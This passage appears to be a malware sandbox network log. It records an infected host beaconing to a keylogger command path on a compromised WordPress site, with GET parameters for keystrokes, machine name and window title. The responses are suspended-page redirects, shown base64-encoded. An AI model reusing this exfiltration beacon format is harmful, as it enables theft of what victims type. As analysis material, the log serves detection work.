SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Sat, 03 Dec 2016 04:55:16 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
50 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20AM text/html post.php 302 Found HTML 345.0 B 10/04/80 12:16:38
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT04OjU1JTIwQU0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
c9d55a6531b83f1ae09867304f863d0b6bcb41f3eb5749fc7965e706e11feff9
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20AM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Sat, 03 Dec 2016 16:55:19 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20AM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
51 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 10/04/80 13:04:05
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Sat, 03 Dec 2016 16:55:19 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
52 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20AM text/html post.php 302 Found HTML 379.0 B 04/16/01 04:30:30
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
